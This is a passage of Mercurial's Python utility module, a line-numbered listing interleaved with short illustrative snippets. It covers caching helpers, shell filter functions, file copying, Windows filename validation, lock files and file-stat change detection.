795 795 node.prev = head.prev
796 796 # N.next = A
797 797 # It is tempting to do just "head" here, however if node is
798 798 # adjacent to head, this will do bad things.
799 799 node.next = head.prev.next
800 800 # E.next = N
801 801 node.next.prev = node
802 802 # A.prev = N
803 803 node.prev.next = node
804 804
805 805 self._head = node
806 806
807 807 def _addcapacity(self):
808 808 """Add a node to the circular linked list.
809 809
810 810 The new node is inserted before the head node.
811 811 """
812 812 head = self._head
813 813 node = _lrucachenode()
814 814 head.prev.next = node
815 815 node.prev = head.prev
816 816 node.next = head
817 817 head.prev = node
818 818 self._size += 1
819 819 return node
820 820
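To make the recycling behaviour concrete, a small sketch using lrucachedict (illustrative values): a read refreshes an entry, and an insert at capacity reuses the oldest node:

```python
d = lrucachedict(2)
d['a'] = 1
d['b'] = 2
d['a']      # access makes 'a' the head again, so 'b' is now oldest
d['c'] = 3  # at capacity: the oldest node ('b') is recycled
assert 'b' not in d and 'a' in d and 'c' in d
```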
821 821 def lrucachefunc(func):
822 822 '''cache most recent results of function calls'''
823 823 cache = {}
824 824 order = collections.deque()
825 825 if func.__code__.co_argcount == 1:
826 826 def f(arg):
827 827 if arg not in cache:
828 828 if len(cache) > 20:
829 829 del cache[order.popleft()]
830 830 cache[arg] = func(arg)
831 831 else:
832 832 order.remove(arg)
833 833 order.append(arg)
834 834 return cache[arg]
835 835 else:
836 836 def f(*args):
837 837 if args not in cache:
838 838 if len(cache) > 20:
839 839 del cache[order.popleft()]
840 840 cache[args] = func(*args)
841 841 else:
842 842 order.remove(args)
843 843 order.append(args)
844 844 return cache[args]
845 845
846 846 return f
847 847
848 848 class propertycache(object):
849 849 def __init__(self, func):
850 850 self.func = func
851 851 self.name = func.__name__
852 852 def __get__(self, obj, type=None):
853 853 result = self.func(obj)
854 854 self.cachevalue(obj, result)
855 855 return result
856 856
857 857 def cachevalue(self, obj, value):
858 858 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
859 859 obj.__dict__[self.name] = value
860 860
861 861 def pipefilter(s, cmd):
862 862 '''filter string S through command CMD, returning its output'''
863 863 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
864 864 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
865 865 pout, perr = p.communicate(s)
866 866 return pout
867 867
868 868 def tempfilter(s, cmd):
869 869 '''filter string S through a pair of temporary files with CMD.
870 870 CMD is used as a template to create the real command to be run,
871 871 with the strings INFILE and OUTFILE replaced by the real names of
872 872 the temporary files generated.'''
873 873 inname, outname = None, None
874 874 try:
875 875 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
876 876 fp = os.fdopen(infd, pycompat.sysstr('wb'))
877 877 fp.write(s)
878 878 fp.close()
879 879 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
880 880 os.close(outfd)
881 881 cmd = cmd.replace('INFILE', inname)
882 882 cmd = cmd.replace('OUTFILE', outname)
883 883 code = os.system(cmd)
884 884 if pycompat.sysplatform == 'OpenVMS' and code & 1:
885 885 code = 0
886 886 if code:
887 887 raise Abort(_("command '%s' failed: %s") %
888 888 (cmd, explainexit(code)))
889 889 return readfile(outname)
890 890 finally:
891 891 try:
892 892 if inname:
893 893 os.unlink(inname)
894 894 except OSError:
895 895 pass
896 896 try:
897 897 if outname:
898 898 os.unlink(outname)
899 899 except OSError:
900 900 pass
901 901
902 902 filtertable = {
903 903 'tempfile:': tempfilter,
904 904 'pipe:': pipefilter,
905 905 }
906 906
907 907 def filter(s, cmd):
908 908 "filter a string through a command that transforms its input to its output"
909 909 for name, fn in filtertable.iteritems():
910 910 if cmd.startswith(name):
911 911 return fn(s, cmd[len(name):].lstrip())
912 912 return pipefilter(s, cmd)
913 913
914 914 def binary(s):
915 915 """return true if a string is binary data"""
916 916 return bool(s and '\0' in s)
917 917
918 918 def increasingchunks(source, min=1024, max=65536):
919 919 '''return no less than min bytes per chunk while data remains,
920 920 doubling min after each chunk until it reaches max'''
921 921 def log2(x):
922 922 if not x:
923 923 return 0
924 924 i = 0
925 925 while x:
926 926 x >>= 1
927 927 i += 1
928 928 return i - 1
929 929
930 930 buf = []
931 931 blen = 0
932 932 for chunk in source:
933 933 buf.append(chunk)
934 934 blen += len(chunk)
935 935 if blen >= min:
936 936 if min < max:
937 937 min = min << 1
938 938 nmin = 1 << log2(blen)
939 939 if nmin > min:
940 940 min = nmin
941 941 if min > max:
942 942 min = max
943 943 yield ''.join(buf)
944 944 blen = 0
945 945 buf = []
946 946 if buf:
947 947 yield ''.join(buf)
948 948
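A sketch of the doubling in increasingchunks(), feeding 4096 one-byte chunks through the defaults (min=1024, max=65536): the first chunk out is min bytes, the next is doubled, and whatever remains is flushed once the source is exhausted:

```python
chunks = list(increasingchunks('x' for _ in range(4096)))
assert [len(c) for c in chunks] == [1024, 2048, 1024]
```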
949 949 Abort = error.Abort
950 950
951 951 def always(fn):
952 952 return True
953 953
954 954 def never(fn):
955 955 return False
956 956
957 957 def nogc(func):
958 958 """disable garbage collector
959 959
960 960 Python's garbage collector triggers a GC each time a certain number of
961 961 container objects (the number being defined by gc.get_threshold()) are
962 962 allocated even when marked not to be tracked by the collector. Tracking has
963 963 no effect on when GCs are triggered, only on what objects the GC looks
964 964 into. As a workaround, disable GC while building complex (huge)
965 965 containers.
966 966
967 967 This garbage collector issue has been fixed in 2.7, but it still affects
968 968 CPython's performance.
969 969 """
970 970 def wrapper(*args, **kwargs):
971 971 gcenabled = gc.isenabled()
972 972 gc.disable()
973 973 try:
974 974 return func(*args, **kwargs)
975 975 finally:
976 976 if gcenabled:
977 977 gc.enable()
978 978 return wrapper
979 979
980 980 if pycompat.ispypy:
981 981 # PyPy runs slower with gc disabled
982 982 nogc = lambda x: x
983 983
984 984 def pathto(root, n1, n2):
985 985 '''return the relative path from one place to another.
986 986 root should use os.sep to separate directories
987 987 n1 should use os.sep to separate directories
988 988 n2 should use "/" to separate directories
989 989 returns an os.sep-separated path.
990 990
991 991 If n1 is a relative path, it's assumed it's
992 992 relative to root.
993 993 n2 should always be relative to root.
994 994 '''
995 995 if not n1:
996 996 return localpath(n2)
997 997 if os.path.isabs(n1):
998 998 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
999 999 return os.path.join(root, localpath(n2))
1000 1000 n2 = '/'.join((pconvert(root), n2))
1001 1001 a, b = splitpath(n1), n2.split('/')
1002 1002 a.reverse()
1003 1003 b.reverse()
1004 1004 while a and b and a[-1] == b[-1]:
1005 1005 a.pop()
1006 1006 b.pop()
1007 1007 b.reverse()
1008 1008 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1009 1009
1010 1010 def mainfrozen():
1011 1011 """return True if we are a frozen executable.
1012 1012
1013 1013 The code supports py2exe (most common, Windows only) and tools/freeze
1014 1014 (portable, not much used).
1015 1015 """
1016 1016 return (safehasattr(sys, "frozen") or # new py2exe
1017 1017 safehasattr(sys, "importers") or # old py2exe
1018 1018 imp.is_frozen(u"__main__")) # tools/freeze
1019 1019
1020 1020 # the location of data files matching the source code
1021 1021 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1022 1022 # executable version (py2exe) doesn't support __file__
1023 1023 datapath = os.path.dirname(pycompat.sysexecutable)
1024 1024 else:
1025 1025 datapath = os.path.dirname(pycompat.fsencode(__file__))
1026 1026
1027 1027 i18n.setdatapath(datapath)
1028 1028
1029 1029 _hgexecutable = None
1030 1030
1031 1031 def hgexecutable():
1032 1032 """return location of the 'hg' executable.
1033 1033
1034 1034 Defaults to $HG or 'hg' in the search path.
1035 1035 """
1036 1036 if _hgexecutable is None:
1037 1037 hg = encoding.environ.get('HG')
1038 1038 mainmod = sys.modules[pycompat.sysstr('__main__')]
1039 1039 if hg:
1040 1040 _sethgexecutable(hg)
1041 1041 elif mainfrozen():
1042 1042 if getattr(sys, 'frozen', None) == 'macosx_app':
1043 1043 # Env variable set by py2app
1044 1044 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1045 1045 else:
1046 1046 _sethgexecutable(pycompat.sysexecutable)
1047 1047 elif (os.path.basename(
1048 1048 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1049 1049 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1050 1050 else:
1051 1051 exe = findexe('hg') or os.path.basename(sys.argv[0])
1052 1052 _sethgexecutable(exe)
1053 1053 return _hgexecutable
1054 1054
1055 1055 def _sethgexecutable(path):
1056 1056 """set location of the 'hg' executable"""
1057 1057 global _hgexecutable
1058 1058 _hgexecutable = path
1059 1059
1060 1060 def _isstdout(f):
1061 1061 fileno = getattr(f, 'fileno', None)
1062 1062 return fileno and fileno() == sys.__stdout__.fileno()
1063 1063
1064 1064 def shellenviron(environ=None):
1065 1065 """return environ with optional override, useful for shelling out"""
1066 1066 def py2shell(val):
1067 1067 'convert python object into string that is useful to shell'
1068 1068 if val is None or val is False:
1069 1069 return '0'
1070 1070 if val is True:
1071 1071 return '1'
1072 1072 return str(val)
1073 1073 env = dict(encoding.environ)
1074 1074 if environ:
1075 1075 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1076 1076 env['HG'] = hgexecutable()
1077 1077 return env
1078 1078
1079 1079 def system(cmd, environ=None, cwd=None, out=None):
1080 1080 '''enhanced shell command execution.
1081 1081 run with environment maybe modified, maybe in different dir.
1082 1082
1083 1083 if out is specified, it is assumed to be a file-like object that has a
1084 1084 write() method. stdout and stderr will be redirected to out.'''
1085 1085 try:
1086 1086 stdout.flush()
1087 1087 except Exception:
1088 1088 pass
1089 1089 cmd = quotecommand(cmd)
1090 1090 env = shellenviron(environ)
1091 1091 if out is None or _isstdout(out):
1092 1092 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1093 1093 env=env, cwd=cwd)
1094 1094 else:
1095 1095 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1096 1096 env=env, cwd=cwd, stdout=subprocess.PIPE,
1097 1097 stderr=subprocess.STDOUT)
1098 1098 for line in iter(proc.stdout.readline, ''):
1099 1099 out.write(line)
1100 1100 proc.wait()
1101 1101 rc = proc.returncode
1102 1102 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1103 1103 rc = 0
1104 1104 return rc
1105 1105
1106 1106 def checksignature(func):
1107 1107 '''wrap a function with code to check for calling errors'''
1108 1108 def check(*args, **kwargs):
1109 1109 try:
1110 1110 return func(*args, **kwargs)
1111 1111 except TypeError:
1112 1112 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1113 1113 raise error.SignatureError
1114 1114 raise
1115 1115
1116 1116 return check
1117 1117
1118 1118 # a whitelist of known filesystems where hardlinks work reliably
1119 1119 _hardlinkfswhitelist = {
1120 1120 'btrfs',
1121 1121 'ext2',
1122 1122 'ext3',
1123 1123 'ext4',
1124 1124 'hfs',
1125 1125 'jfs',
1126 1126 'reiserfs',
1127 1127 'tmpfs',
1128 1128 'ufs',
1129 1129 'xfs',
1130 1130 'zfs',
1131 1131 }
1132 1132
1133 1133 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1134 1134 '''copy a file, preserving mode and optionally other stat info like
1135 1135 atime/mtime
1136 1136
1137 1137 checkambig argument is used with filestat, and is useful only if
1138 1138 destination file is guarded by any lock (e.g. repo.lock or
1139 1139 repo.wlock).
1140 1140
1141 1141 copystat and checkambig should be exclusive.
1142 1142 '''
1143 1143 assert not (copystat and checkambig)
1144 1144 oldstat = None
1145 1145 if os.path.lexists(dest):
1146 1146 if checkambig:
1147 1147 oldstat = checkambig and filestat.frompath(dest)
1148 1148 unlink(dest)
1149 1149 if hardlink:
1150 1150 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1151 1151 # unless we are confident that dest is on a whitelisted filesystem.
1152 1152 try:
1153 1153 fstype = getfstype(os.path.dirname(dest))
1154 1154 except OSError:
1155 1155 fstype = None
1156 1156 if fstype not in _hardlinkfswhitelist:
1157 1157 hardlink = False
1158 1158 if hardlink:
1159 1159 try:
1160 1160 oslink(src, dest)
1161 1161 return
1162 1162 except (IOError, OSError):
1163 1163 pass # fall back to normal copy
1164 1164 if os.path.islink(src):
1165 1165 os.symlink(os.readlink(src), dest)
1166 1166 # copytime is ignored for symlinks, but in general copytime isn't needed
1167 1167 # for them anyway
1168 1168 else:
1169 1169 try:
1170 1170 shutil.copyfile(src, dest)
1171 1171 if copystat:
1172 1172 # copystat also copies mode
1173 1173 shutil.copystat(src, dest)
1174 1174 else:
1175 1175 shutil.copymode(src, dest)
1176 1176 if oldstat and oldstat.stat:
1177 1177 newstat = filestat.frompath(dest)
1178 1178 if newstat.isambig(oldstat):
1179 1179 # stat of copied file is ambiguous to original one
1180 1180 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1181 1181 os.utime(dest, (advanced, advanced))
1182 1182 except shutil.Error as inst:
1183 1183 raise Abort(str(inst))
1184 1184
1185 1185 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1186 1186 """Copy a directory tree using hardlinks if possible."""
1187 1187 num = 0
1188 1188
1189 1189 gettopic = lambda: hardlink and _('linking') or _('copying')
1190 1190
1191 1191 if os.path.isdir(src):
1192 1192 if hardlink is None:
1193 1193 hardlink = (os.stat(src).st_dev ==
1194 1194 os.stat(os.path.dirname(dst)).st_dev)
1195 1195 topic = gettopic()
1196 1196 os.mkdir(dst)
1197 1197 for name, kind in listdir(src):
1198 1198 srcname = os.path.join(src, name)
1199 1199 dstname = os.path.join(dst, name)
1200 1200 def nprog(t, pos):
1201 1201 if pos is not None:
1202 1202 return progress(t, pos + num)
1203 1203 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1204 1204 num += n
1205 1205 else:
1206 1206 if hardlink is None:
1207 1207 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1208 1208 os.stat(os.path.dirname(dst)).st_dev)
1209 1209 topic = gettopic()
1210 1210
1211 1211 if hardlink:
1212 1212 try:
1213 1213 oslink(src, dst)
1214 1214 except (IOError, OSError):
1215 1215 hardlink = False
1216 1216 shutil.copy(src, dst)
1217 1217 else:
1218 1218 shutil.copy(src, dst)
1219 1219 num += 1
1220 1220 progress(topic, num)
1221 1221 progress(topic, None)
1222 1222
1223 1223 return hardlink, num
1224 1224
1225 1225 _winreservednames = b'''con prn aux nul
1226 1226 com1 com2 com3 com4 com5 com6 com7 com8 com9
1227 1227 lpt1 lpt2 lpt3 lpt4 lpt5 lpt6 lpt7 lpt8 lpt9'''.split()
1228 1228 _winreservedchars = ':*?"<>|'
1229 1229 def checkwinfilename(path):
1230 1230 r'''Check that the base-relative path is a valid filename on Windows.
1231 1231 Returns None if the path is ok, or a UI string describing the problem.
1232 1232
1233 1233 >>> checkwinfilename("just/a/normal/path")
1234 1234 >>> checkwinfilename("foo/bar/con.xml")
1235 1235 "filename contains 'con', which is reserved on Windows"
1236 1236 >>> checkwinfilename("foo/con.xml/bar")
1237 1237 "filename contains 'con', which is reserved on Windows"
1238 1238 >>> checkwinfilename("foo/bar/xml.con")
1239 1239 >>> checkwinfilename("foo/bar/AUX/bla.txt")
1240 1240 "filename contains 'AUX', which is reserved on Windows"
1241 1241 >>> checkwinfilename("foo/bar/bla:.txt")
1242 1242 "filename contains ':', which is reserved on Windows"
1243 1243 >>> checkwinfilename("foo/bar/b\07la.txt")
1244 1244 "filename contains '\\x07', which is invalid on Windows"
1245 1245 >>> checkwinfilename("foo/bar/bla ")
1246 1246 "filename ends with ' ', which is not allowed on Windows"
1247 1247 >>> checkwinfilename("../bar")
1248 1248 >>> checkwinfilename("foo\\")
1249 1249 "filename ends with '\\', which is invalid on Windows"
1250 1250 >>> checkwinfilename("foo\\/bar")
1251 1251 "directory name ends with '\\', which is invalid on Windows"
1252 1252 '''
1253 1253 if path.endswith('\\'):
1254 1254 return _("filename ends with '\\', which is invalid on Windows")
1255 1255 if '\\/' in path:
1256 1256 return _("directory name ends with '\\', which is invalid on Windows")
1257 1257 for n in path.replace('\\', '/').split('/'):
1258 1258 if not n:
1259 1259 continue
1260 1260 for c in _filenamebytestr(n):
1261 1261 if c in _winreservedchars:
1262 1262 return _("filename contains '%s', which is reserved "
1263 1263 "on Windows") % c
1264 1264 if ord(c) <= 31:
1265 1265 return _("filename contains %r, which is invalid "
1266 1266 "on Windows") % c
1267 1267 base = n.split('.')[0]
1268 1268 if base and base.lower() in _winreservednames:
1269 1269 return _("filename contains '%s', which is reserved "
1270 1270 "on Windows") % base
1271 1271 t = n[-1]
1272 1272 if t in '. ' and n not in '..':
1273 1273 return _("filename ends with '%s', which is not allowed "
1274 1274 "on Windows") % t
1275 1275
1276 1276 if pycompat.osname == 'nt':
1277 1277 checkosfilename = checkwinfilename
1278 1278 timer = time.clock
1279 1279 else:
1280 1280 checkosfilename = platform.checkosfilename
1281 1281 timer = time.time
1282 1282
1283 1283 if safehasattr(time, "perf_counter"):
1284 1284 timer = time.perf_counter
1285 1285
1286 1286 def makelock(info, pathname):
1287 1287 try:
1288 1288 return os.symlink(info, pathname)
1289 1289 except OSError as why:
1290 1290 if why.errno == errno.EEXIST:
1291 1291 raise
1292 1292 except AttributeError: # no symlink in os
1293 1293 pass
1294 1294
1295 1295 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1296 1296 os.write(ld, info)
1297 1297 os.close(ld)
1298 1298
1299 1299 def readlock(pathname):
1300 1300 try:
1301 1301 return os.readlink(pathname)
1302 1302 except OSError as why:
1303 1303 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1304 1304 raise
1305 1305 except AttributeError: # no symlink in os
1306 1306 pass
1307 1307 fp = posixfile(pathname)
1308 1308 r = fp.read()
1309 1309 fp.close()
1310 1310 return r
1311 1311
1312 1312 def fstat(fp):
1313 1313 '''stat file object that may not have fileno method.'''
1314 1314 try:
1315 1315 return os.fstat(fp.fileno())
1316 1316 except AttributeError:
1317 1317 return os.stat(fp.name)
1318 1318
1319 1319 # File system features
1320 1320
1321 1321 def fscasesensitive(path):
1322 1322 """
1323 1323 Return true if the given path is on a case-sensitive filesystem
1324 1324
1325 1325 Requires a path (like /foo/.hg) ending with a foldable final
1326 1326 directory component.
1327 1327 """
1328 1328 s1 = os.lstat(path)
1329 1329 d, b = os.path.split(path)
1330 1330 b2 = b.upper()
1331 1331 if b == b2:
1332 1332 b2 = b.lower()
1333 1333 if b == b2:
1334 1334 return True # no evidence against case sensitivity
1335 1335 p2 = os.path.join(d, b2)
1336 1336 try:
1337 1337 s2 = os.lstat(p2)
1338 1338 if s2 == s1:
1339 1339 return False
1340 1340 return True
1341 1341 except OSError:
1342 1342 return True
1343 1343
1344 1344 try:
1345 1345 import re2
1346 1346 _re2 = None
1347 1347 except ImportError:
1348 1348 _re2 = False
1349 1349
1350 1350 class _re(object):
1351 1351 def _checkre2(self):
1352 1352 global _re2
1353 1353 try:
1354 1354 # check if match works, see issue3964
1355 1355 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1356 1356 except ImportError:
1357 1357 _re2 = False
1358 1358
1359 1359 def compile(self, pat, flags=0):
1360 1360 '''Compile a regular expression, using re2 if possible
1361 1361
1362 1362 For best performance, use only re2-compatible regexp features. The
1363 1363 only flags from the re module that are re2-compatible are
1364 1364 IGNORECASE and MULTILINE.'''
1365 1365 if _re2 is None:
1366 1366 self._checkre2()
1367 1367 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1368 1368 if flags & remod.IGNORECASE:
1369 1369 pat = '(?i)' + pat
1370 1370 if flags & remod.MULTILINE:
1371 1371 pat = '(?m)' + pat
1372 1372 try:
1373 1373 return re2.compile(pat)
1374 1374 except re2.error:
1375 1375 pass
1376 1376 return remod.compile(pat, flags)
1377 1377
1378 1378 @propertycache
1379 1379 def escape(self):
1380 1380 '''Return the version of escape corresponding to self.compile.
1381 1381
1382 1382 This is imperfect because whether re2 or re is used for a particular
1383 1383 function depends on the flags, etc, but it's the best we can do.
1384 1384 '''
1385 1385 global _re2
1386 1386 if _re2 is None:
1387 1387 self._checkre2()
1388 1388 if _re2:
1389 1389 return re2.escape
1390 1390 else:
1391 1391 return remod.escape
1392 1392
1393 1393 re = _re()
1394 1394
1395 1395 _fspathcache = {}
1396 1396 def fspath(name, root):
1397 1397 '''Get name in the case stored in the filesystem
1398 1398
1399 1399 The name should be relative to root, and be normcase-ed for efficiency.
1400 1400
1401 1401 Note that this function is unnecessary, and should not be
1402 1402 called, for case-sensitive filesystems (simply because it's expensive).
1403 1403
1404 1404 The root should be normcase-ed, too.
1405 1405 '''
1406 1406 def _makefspathcacheentry(dir):
1407 1407 return dict((normcase(n), n) for n in os.listdir(dir))
1408 1408
1409 1409 seps = pycompat.ossep
1410 1410 if pycompat.osaltsep:
1411 1411 seps = seps + pycompat.osaltsep
1412 1412 # Protect backslashes. This gets silly very quickly.
1413 1413 seps = seps.replace('\\', '\\\\')
1414 1414 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1415 1415 dir = os.path.normpath(root)
1416 1416 result = []
1417 1417 for part, sep in pattern.findall(name):
1418 1418 if sep:
1419 1419 result.append(sep)
1420 1420 continue
1421 1421
1422 1422 if dir not in _fspathcache:
1423 1423 _fspathcache[dir] = _makefspathcacheentry(dir)
1424 1424 contents = _fspathcache[dir]
1425 1425
1426 1426 found = contents.get(part)
1427 1427 if not found:
1428 1428 # retry "once per directory" per "dirstate.walk" which
1429 1429 # may take place for each patch of "hg qpush", for example
1430 1430 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1431 1431 found = contents.get(part)
1432 1432
1433 1433 result.append(found or part)
1434 1434 dir = os.path.join(dir, part)
1435 1435
1436 1436 return ''.join(result)
1437 1437
1438 1438 def getfstype(dirpath):
1439 1439 '''Get the filesystem type name from a directory (best-effort)
1440 1440
1441 1441 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1442 1442 '''
1443 1443 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1444 1444
1445 1445 def checknlink(testfile):
1446 1446 '''check whether hardlink count reporting works properly'''
1447 1447
1448 1448 # testfile may be open, so we need a separate file for checking to
1449 1449 # work around issue2543 (or testfile may get lost on Samba shares)
1450 1450 f1 = testfile + ".hgtmp1"
1451 1451 if os.path.lexists(f1):
1452 1452 return False
1453 1453 try:
1454 1454 posixfile(f1, 'w').close()
1455 1455 except IOError:
1456 1456 try:
1457 1457 os.unlink(f1)
1458 1458 except OSError:
1459 1459 pass
1460 1460 return False
1461 1461
1462 1462 f2 = testfile + ".hgtmp2"
1463 1463 fd = None
1464 1464 try:
1465 1465 oslink(f1, f2)
1466 1466 # nlinks() may behave differently for files on Windows shares if
1467 1467 # the file is open.
1468 1468 fd = posixfile(f2)
1469 1469 return nlinks(f2) > 1
1470 1470 except OSError:
1471 1471 return False
1472 1472 finally:
1473 1473 if fd is not None:
1474 1474 fd.close()
1475 1475 for f in (f1, f2):
1476 1476 try:
1477 1477 os.unlink(f)
1478 1478 except OSError:
1479 1479 pass
1480 1480
1481 1481 def endswithsep(path):
1482 1482 '''Check path ends with os.sep or os.altsep.'''
1483 1483 return (path.endswith(pycompat.ossep)
1484 1484 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1485 1485
1486 1486 def splitpath(path):
1487 1487 '''Split path by os.sep.
1488 1488 Note that this function does not use os.altsep because this is
1489 1489 an alternative to a simple "xxx.split(os.sep)".
1490 1490 It is recommended to use os.path.normpath() before using this
1491 1491 function if needed.'''
1492 1492 return path.split(pycompat.ossep)
1493 1493
1494 1494 def gui():
1495 1495 '''Are we running in a GUI?'''
1496 1496 if pycompat.sysplatform == 'darwin':
1497 1497 if 'SSH_CONNECTION' in encoding.environ:
1498 1498 # handle SSH access to a box where the user is logged in
1499 1499 return False
1500 1500 elif getattr(osutil, 'isgui', None):
1501 1501 # check if a CoreGraphics session is available
1502 1502 return osutil.isgui()
1503 1503 else:
1504 1504 # pure build; use a safe default
1505 1505 return True
1506 1506 else:
1507 1507 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1508 1508
1509 1509 def mktempcopy(name, emptyok=False, createmode=None):
1510 1510 """Create a temporary file with the same contents from name
1511 1511
1512 1512 The permission bits are copied from the original file.
1513 1513
1514 1514 If the temporary file is going to be truncated immediately, you
1515 1515 can use emptyok=True as an optimization.
1516 1516
1517 1517 Returns the name of the temporary file.
1518 1518 """
1519 1519 d, fn = os.path.split(name)
1520 1520 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, dir=d)
1521 1521 os.close(fd)
1522 1522 # Temporary files are created with mode 0600, which is usually not
1523 1523 # what we want. If the original file already exists, just copy
1524 1524 # its mode. Otherwise, manually obey umask.
1525 1525 copymode(name, temp, createmode)
1526 1526 if emptyok:
1527 1527 return temp
1528 1528 try:
1529 1529 try:
1530 1530 ifp = posixfile(name, "rb")
1531 1531 except IOError as inst:
1532 1532 if inst.errno == errno.ENOENT:
1533 1533 return temp
1534 1534 if not getattr(inst, 'filename', None):
1535 1535 inst.filename = name
1536 1536 raise
1537 1537 ofp = posixfile(temp, "wb")
1538 1538 for chunk in filechunkiter(ifp):
1539 1539 ofp.write(chunk)
1540 1540 ifp.close()
1541 1541 ofp.close()
1542 1542 except: # re-raises
1543 1543 try: os.unlink(temp)
1544 1544 except OSError: pass
1545 1545 raise
1546 1546 return temp
1547 1547
1548 1548 class filestat(object):
1549 1549 """help to exactly detect change of a file
1550 1550
1551 1551 The 'stat' attribute is the result of 'os.stat()' if the specified
1552 1552 'path' exists; otherwise it is None. This saves callers of this
1553 1553 class a preparatory 'exists()' check.
1554 1554 """
1555 1555 def __init__(self, stat):
1556 1556 self.stat = stat
1557 1557
1558 1558 @classmethod
1559 1559 def frompath(cls, path):
1560 1560 try:
1561 1561 stat = os.stat(path)
1562 1562 except OSError as err:
1563 1563 if err.errno != errno.ENOENT:
1564 1564 raise
1565 1565 stat = None
1566 1566 return cls(stat)
1567 1567
1568 1568 @classmethod
1569 1569 def fromfp(cls, fp):
1570 1570 stat = os.fstat(fp.fileno())
1571 1571 return cls(stat)
1572 1572
1573 1573 __hash__ = object.__hash__
1574 1574
1575 1575 def __eq__(self, old):
1576 1576 try:
1577 1577 # if ambiguity between stat of new and old file is
1578 1578 # avoided, comparison of size, ctime and mtime is enough
1579 1579 # to exactly detect change of a file regardless of platform
1580 1580 return (self.stat.st_size == old.stat.st_size and
1581 1581 self.stat.st_ctime == old.stat.st_ctime and
1582 1582 self.stat.st_mtime == old.stat.st_mtime)
1583 1583 except AttributeError:
1584 1584 pass
1585 1585 try:
1586 1586 return self.stat is None and old.stat is None
1587 1587 except AttributeError:
1588 1588 return False
1589 1589
1590 1590 def isambig(self, old):
1591 1591 """Examine whether new (= self) stat is ambiguous against old one
1592 1592
1593 1593 "S[N]" below means stat of a file at N-th change:
1594 1594
1595 1595 - S[n-1].ctime < S[n].ctime: can detect change of a file
1596 1596 - S[n-1].ctime == S[n].ctime
1597 1597 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1598 1598 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1599 1599 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1600 1600 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1601 1601
1602 1602 Case (*2) above means that a file was changed twice or more
1603 1603 within the same second (= S[n-1].ctime), so comparison of
1604 1604 timestamps is ambiguous.
1605 1605
1606 1606 The basic idea to avoid such ambiguity is to "advance mtime by
1607 1607 1 sec, if the timestamp is ambiguous".
1608 1608
1609 1609 But advancing mtime only in case (*2) doesn't work as
1610 1610 expected, because a naturally advanced S[n].mtime in case (*1)
1611 1611 might be equal to a manually advanced S[n-1 or earlier].mtime.
1612 1612
1613 1613 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1614 1614 treated as ambiguous regardless of mtime, to avoid overlooking
1615 1615 changes caused by collisions between such mtimes.
1616 1616
1617 1617 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1618 1618 S[n].mtime", even if the file's size is unchanged.
1619 1619 """
1620 1620 try:
1621 1621 return (self.stat.st_ctime == old.stat.st_ctime)
1622 1622 except AttributeError:
1623 1623 return False
1624 1624
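To make the ctime/mtime rules above concrete, here is a small standalone sketch (an illustration, not part of the module; the file name is made up) of detecting an ambiguous rewrite and disambiguating it the same way avoidambig() does below:

import os

# two same-size writes can land in the same second ...
with open('guarded-file', 'wb') as f:
    f.write(b'one')
old = os.stat('guarded-file')
with open('guarded-file', 'wb') as f:
    f.write(b'two')
new = os.stat('guarded-file')

# ... in which case (size, ctime, mtime) may all compare equal and
# the rewrite would go unnoticed. Treat equal ctimes as ambiguous
# and force the mtimes apart:
if new.st_ctime == old.st_ctime:
    advanced = (int(old.st_mtime) + 1) & 0x7fffffff
    os.utime('guarded-file', (advanced, advanced))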
1625 1625 def avoidambig(self, path, old):
1626 1626 """Change file stat of specified path to avoid ambiguity
1627 1627
1628 1628 'old' should be the previous filestat of 'path'.
1629 1629
1630 1630 This skips avoiding ambiguity if the process doesn't have
1631 1631 appropriate privileges for 'path', and returns False in that
1632 1632 case.
1633 1633
1634 1634 Otherwise, this returns True, as "ambiguity is avoided".
1635 1635 """
1636 1636 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1637 1637 try:
1638 1638 os.utime(path, (advanced, advanced))
1639 1639 except OSError as inst:
1640 1640 if inst.errno == errno.EPERM:
1641 1641 # utime() on the file created by another user causes EPERM,
1642 1642 # if a process doesn't have appropriate privileges
1643 1643 return False
1644 1644 raise
1645 1645 return True
1646 1646
1647 1647 def __ne__(self, other):
1648 1648 return not self == other
1649 1649
1650 1650 class atomictempfile(object):
1651 1651 '''writable file object that atomically updates a file
1652 1652
1653 1653 All writes will go to a temporary copy of the original file. Call
